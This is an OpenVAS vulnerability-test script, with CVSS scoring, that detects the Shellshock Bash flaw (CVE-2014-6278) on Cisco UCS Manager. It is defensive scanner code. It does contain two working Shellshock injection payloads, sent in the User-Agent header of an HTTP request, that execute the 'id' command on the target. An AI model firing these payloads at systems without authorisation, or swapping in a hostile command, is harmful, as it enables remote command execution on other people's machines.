Lucene search

K
openvasCopyright (C) 2016 Greenbone AGOPENVAS:1361412562310105570
HistoryMar 17, 2016 - 12:00 a.m.

Cisco UCS GNU Bash Environment Variable Command Injection Vulnerability (Shellshock)

2016-03-1700:00:00
Copyright (C) 2016 Greenbone AG
plugins.openvas.org
79

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

9.5

Confidence

High

EPSS

0.973

Percentile

99.9%

On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to
the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell,
depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and
scripts hosted on web server

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later

CPE = 'cpe:/a:cisco:unified_computing_system_software';

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105570");
  script_cve_id("CVE-2014-6278");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_version("2023-04-18T10:19:20+0000");

  script_name("Cisco UCS GNU Bash Environment Variable Command Injection Vulnerability (Shellshock)");

  script_xref(name:"URL", value:"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash");
  script_xref(name:"URL", value:"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCur01379");

  script_tag(name:"last_modification", value:"2023-04-18 10:19:20 +0000 (Tue, 18 Apr 2023)");
  script_tag(name:"creation_date", value:"2016-03-17 09:25:23 +0100 (Thu, 17 Mar 2016)");
  script_category(ACT_ATTACK);
  script_family("CISCO");
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_dependencies("gb_cisco_ucs_manager_detect.nasl");
  script_require_ports("Services/www", 443);
  script_mandatory_keys("cisco_ucs_manager/installed");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"impact", value:"Successful exploitation will allow remote  or local attackers to inject  shell commands, allowing local privilege
  escalation or remote command execution depending on the application vector.");

  script_tag(name:"vuldetect", value:"Try to execute the `id' command by sending a crafted HTTP GET request and check the response.");

  script_tag(name:"insight", value:"GNU bash contains a flaw that is triggered when evaluating environment variables passed from another environment.
  After processing a function definition, bash continues to process trailing strings.");

  script_tag(name:"solution", value:"See vendor advisory for a solution");

  script_tag(name:"summary", value:"On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to
  the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell,
  depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and
  scripts hosted on web server");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if( ! port = get_app_port( cpe:CPE ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

url = '/ucsm/isSamInstalled.cgi';
useragent = http_get_user_agent();
vtstrings = get_vt_strings();
vt_string = vtstrings["default"];

attacks = make_list(  '() { ' + vt_string + ':; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id;',
                      '() { _; ' + vt_string + '; } >_[$($())] {  echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id; }'
                   );

host = http_host_name( port:port );

foreach attack ( attacks )
{
  req = 'GET ' + url + ' HTTP/1.1\r\n' +
        'Host: ' + host + '\r\n' +
        'User-Agent: ' + attack + '\r\n' +
        'X-Security-Scanner: ' + useragent + '\r\n' +
        'Connection: close\r\n' +
        'Accept: */*\r\n' +
        '\r\n';

  buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );

  if( buf =~ 'uid=[0-9]+.*gid=[0-9]+' )
  {
    report = http_report_vuln_url(  port:port, url:url ) + '\n\n';
    report += "It was possible to execute the `id' command on the remote host" + '\n';
    report += '\nResponse:\n' + buf;
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 99 );

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

9.5

Confidence

High

EPSS

0.973

Percentile

99.9%